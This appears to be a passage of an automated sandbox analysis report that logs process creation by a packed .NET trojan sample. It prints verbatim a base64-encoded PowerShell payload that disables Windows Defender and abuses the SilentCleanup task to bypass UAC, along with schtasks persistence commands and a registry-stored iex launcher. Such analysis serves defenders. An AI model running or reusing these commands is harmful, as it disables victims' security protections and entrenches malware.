AoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: unknown	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
